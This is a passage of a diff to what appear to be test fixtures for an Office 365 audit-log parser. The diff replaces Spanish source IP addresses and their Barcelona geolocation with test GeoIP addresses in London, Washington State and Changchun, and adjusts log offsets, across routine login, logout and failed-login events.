 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "213.97.47.133",
+ "related.ip": "81.2.69.143",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "213.97.47.133",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
@@ -2470,8 +2430,8 @@
 },
 {
 "@timestamp": "2020-02-12T21:38:29.000Z",
- "client.address": "79.159.10.151",
- "client.ip": "79.159.10.151",
+ "client.address": "216.160.83.57",
+ "client.ip": "216.160.83.57",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -2489,7 +2449,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 35847,
+ "log.offset": 35799,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -2506,10 +2466,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "79.159.10.151",
+ "o365.audit.ActorIpAddress": "216.160.83.57",
 "o365.audit.ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "79.159.10.151",
+ "o365.audit.ClientIP": "216.160.83.57",
 "o365.audit.CreationTime": "2020-02-12T21:38:29",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2538,20 +2498,19 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "79.159.10.151",
+ "related.ip": "216.160.83.57",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "79.159.10.151",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.57",
 "tags": [
 "forwarded"
 ],
@@ -2569,8 +2528,8 @@
 },
 {
 "@timestamp": "2020-02-12T21:38:37.000Z",
- "client.address": "79.159.10.151",
- "client.ip": "79.159.10.151",
+ "client.address": "216.160.83.57",
+ "client.ip": "216.160.83.57",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -2588,7 +2547,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 37297,
+ "log.offset": 37249,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -2605,10 +2564,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "79.159.10.151",
+ "o365.audit.ActorIpAddress": "216.160.83.57",
 "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "79.159.10.151",
+ "o365.audit.ClientIP": "216.160.83.57",
 "o365.audit.CreationTime": "2020-02-12T21:38:37",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2637,20 +2596,19 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "79.159.10.151", + "related.ip": "216.160.83.57", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "79.159.10.151", + "source.as.number": 209, + "source.geo.city_name": "Milton", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.57", "tags": [ "forwarded" ], @@ -2668,8 +2626,8 @@ }, { "@timestamp": "2020-02-12T10:51:50.000Z", - "client.address": "79.159.10.151", - "client.ip": "79.159.10.151", + "client.address": "216.160.83.57", + "client.ip": "216.160.83.57", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -2687,7 +2645,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 38748, + "log.offset": 38700, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -2704,10 +2662,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "79.159.10.151", + "o365.audit.ActorIpAddress": "216.160.83.57", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "79.159.10.151", + "o365.audit.ClientIP": "216.160.83.57", "o365.audit.CreationTime": "2020-02-12T10:51:50", "o365.audit.ExtendedProperties.KeepMeSignedIn": "False", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -2736,20 +2694,19 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "79.159.10.151", + "related.ip": "216.160.83.57", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "79.159.10.151", + "source.as.number": 209, + "source.geo.city_name": "Milton", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.57", "tags": [ "forwarded" ], @@ -2767,8 +2724,8 @@ }, { "@timestamp": "2020-02-10T15:13:42.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", 
@@ -2786,7 +2743,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 40199, + "log.offset": 40151, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -2803,10 +2760,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-10T15:13:42", "o365.audit.ExtendedProperties.KeepMeSignedIn": "False", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -2835,20 +2792,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -2866,8 +2821,8 @@ }, { "@timestamp": "2020-02-07T16:42:59.000Z", - "client.address": "213.97.47.133", - "client.ip": "213.97.47.133", + "client.address": "81.2.69.143", + "client.ip": "81.2.69.143", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -2885,7 +2840,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 41650, + "log.offset": 41600, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -2902,10 +2857,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "213.97.47.133", + "o365.audit.ActorIpAddress": "81.2.69.143", "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "213.97.47.133", + "o365.audit.ClientIP": "81.2.69.143", "o365.audit.CreationTime": "2020-02-07T16:42:59", "o365.audit.ExtendedProperties.RequestType": "Login:login", "o365.audit.ExtendedProperties.ResultStatusDetail": "Success", 
@@ -2933,20 +2888,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "213.97.47.133", + "related.ip": "81.2.69.143", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "213.97.47.133", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "forwarded" ], @@ -2964,8 +2917,8 @@ }, { "@timestamp": "2020-02-07T16:43:02.000Z", - "client.address": "213.97.47.133", - "client.ip": "213.97.47.133", + "client.address": "81.2.69.143", + "client.ip": "81.2.69.143", "event.action": "UserLoginFailed", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -2983,7 +2936,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 43031, + "log.offset": 42977, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -3000,10 +2953,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "213.97.47.133", + "o365.audit.ActorIpAddress": "81.2.69.143", "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "213.97.47.133", + "o365.audit.ClientIP": "81.2.69.143", "o365.audit.CreationTime": "2020-02-07T16:43:02", "o365.audit.ExtendedProperties.FlowTokenScenario": "Login", "o365.audit.ExtendedProperties.RequestType": "Login:login", @@ -3033,20 +2986,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "213.97.47.133", + "related.ip": "81.2.69.143", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "213.97.47.133", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "forwarded" ], @@ -3064,8 +3015,8 @@ }, { "@timestamp": "2020-02-12T21:38:19.000Z", - "client.address": "79.159.10.151", - "client.ip": "79.159.10.151", + "client.address": "216.160.83.57", + "client.ip": "216.160.83.57", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", 
@@ -3082,7 +3033,7 @@ "fileset.name": "audit", "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "input.type": "log", - "log.offset": 44539, + "log.offset": 44481, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -3091,10 +3042,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "79.159.10.151", + "o365.audit.ActorIpAddress": "216.160.83.57", "o365.audit.ApplicationId": "", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "79.159.10.151", + "o365.audit.ClientIP": "216.160.83.57", "o365.audit.CreationTime": "2020-02-12T21:38:19", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Logout", "o365.audit.ExtendedProperties.ResultStatusDetail": "Success", @@ -3122,19 +3073,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "79.159.10.151", + "related.ip": "216.160.83.57", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "79.159.10.151", + "source.as.number": 209, + "source.geo.city_name": "Milton", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.57", "tags": [ "forwarded" ], 
@@ -3149,8 +3099,8 @@ }, { "@timestamp": "2020-02-07T16:43:40.000Z", - "client.address": "213.97.47.133", - "client.ip": "213.97.47.133", + "client.address": "81.2.69.143", + "client.ip": "81.2.69.143", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -3168,7 +3118,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 45648, + "log.offset": 45590, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -3185,10 +3135,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "213.97.47.133", + "o365.audit.ActorIpAddress": "81.2.69.143", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "213.97.47.133", + "o365.audit.ClientIP": "81.2.69.143", "o365.audit.CreationTime": "2020-02-07T16:43:40", "o365.audit.ExtendedProperties.KeepMeSignedIn": "True", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", 
@@ -3217,20 +3167,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "213.97.47.133", + "related.ip": "81.2.69.143", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "213.97.47.133", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "forwarded" ], @@ -3248,8 +3196,8 @@ }, { "@timestamp": "2020-02-09T15:30:58.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -3266,7 +3214,7 @@ "fileset.name": "audit", "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "input.type": "log", - "log.offset": 47098, + "log.offset": 47036, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -3275,10 +3223,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.ApplicationId": "", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:30:58", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Logout", "o365.audit.ExtendedProperties.ResultStatusDetail": "Success", @@ -3306,19 +3254,17 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -3333,8 +3279,8 @@ }, { "@timestamp": "2020-02-09T15:31:33.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "UserLoginFailed", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", 
@@ -3352,7 +3298,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 48207, + "log.offset": 48143, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -3369,10 +3315,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:31:33", "o365.audit.ExtendedProperties.FlowTokenScenario": "Login", "o365.audit.ExtendedProperties.RequestType": "Login:login", @@ -3402,20 +3348,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -3433,8 +3377,8 @@ }, { "@timestamp": "2020-02-10T15:14:25.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -3451,7 +3395,7 @@ "fileset.name": "audit", "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "input.type": "log", - "log.offset": 49715, + "log.offset": 49649, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -3460,10 +3404,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.ApplicationId": "", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-10T15:14:25", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Logout", "o365.audit.ExtendedProperties.ResultStatusDetail": "Success", 
@@ -3491,19 +3435,17 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -3518,8 +3460,8 @@ }, { "@timestamp": "2020-02-10T15:14:51.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "UserLoginFailed", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -3537,7 +3479,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 50824, + "log.offset": 50756, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -3554,10 +3496,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-10T15:14:51", "o365.audit.ExtendedProperties.FlowTokenScenario": "Login", "o365.audit.ExtendedProperties.RequestType": "Login:login", @@ -3587,20 +3529,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -3618,8 +3558,8 @@ }, { "@timestamp": "2020-02-10T15:29:56.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", 
@@ -3637,7 +3577,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 52332, + "log.offset": 52262, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -3654,10 +3594,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-10T15:29:56", "o365.audit.ExtendedProperties.KeepMeSignedIn": "False", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -3686,20 +3626,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": 